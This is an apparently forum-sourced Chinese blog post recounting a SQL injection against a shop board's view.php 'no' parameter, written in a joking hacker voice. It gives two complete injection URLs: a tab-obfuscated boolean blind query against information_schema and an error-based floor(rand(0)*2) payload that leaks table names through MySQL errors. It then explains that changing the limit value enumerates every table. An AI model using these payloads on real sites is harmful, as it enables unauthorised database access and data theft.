修改limit的值进行注入

话说某脱裤的黑客被一个注入点弄得蛋疼了，详情请见 http://t00ls.net/thread-14032-1-1.html。 在t00ls发了个帖子，对于这些过滤啥，防火墙啥的，小菜我不懂啊，咱准备等其他黑客回答，然后学习学习，突然我帖子里看到精逼两个字，小菜我眼睛都直了，于是不自量力来折腾折腾.
话说咱菜啊，咱碰到注入点没啥办法，咱能力不行，咱就用工具，正如某岛国爱情动作片里一下，拿起工具，干之，于是就掏出了穿山甲，看看是否能射进去。咱用起穿山甲，咱就sb了，明明是个点，啥都跑不出来哇。

咱思考思考。稍微手工了一下，咱就明白了

这就明白了吧  换季的时候皮肤管理这就是关键字， 于是我在穿山甲的关键字中填写，得出了一些信息， linux的服务器，mysql，等等，可惜在跑表的时候又蛋疼了！发现跑出的表残缺不全。

可总能跑出点东西，于是我就抓了一下包，参考一下穿山甲的注入语句，以换季的时候皮肤管理关键字进行判断进行盲住！

http://xx.com/shop/board/view.php?id=pnotes&no=33%09and%09(select%09char_length(table_name)%09from%09(select%09*%09from%09(select%09*%09from%09information_schema.tables%09where%09table_schema=0x706f6975323538305f676f646f5f636e%09order%09by%09table_schema%09limit%0941,1)%09t%09order%09by%09table_schema%09desc)t%09limit%091)%3E8%09and%091=1
咱就准备一个个的猜，直到猜出表。可咱就想，这累啊，咱写个文章用着笨办法该不会被吐司的黑客踩死啊，咱就蹦跶蹦跶的被关进小黑屋了，咱就问黑客，询牛人，查手册，翻资料，构造了一条语句，终于才偶的大牛朋友 jsbug的博客里找到了一条语句！http://hi.baidu.com/jsbug/blog/item/4602a12c329165351e308943.html  这条语句可以使mysql报错，于是我构造了一下
http://xx.com/shop/board/view.php?id=pnotes&no=33%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x706F6975323538305F676F646F5F636E%20limit%201,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

通过报错得到了key，也就是表。'67645F62645F6D656574696E67'~1': key 'group_key' ，通过解密得到正确的表名。

修改limit的值，就得到所有的表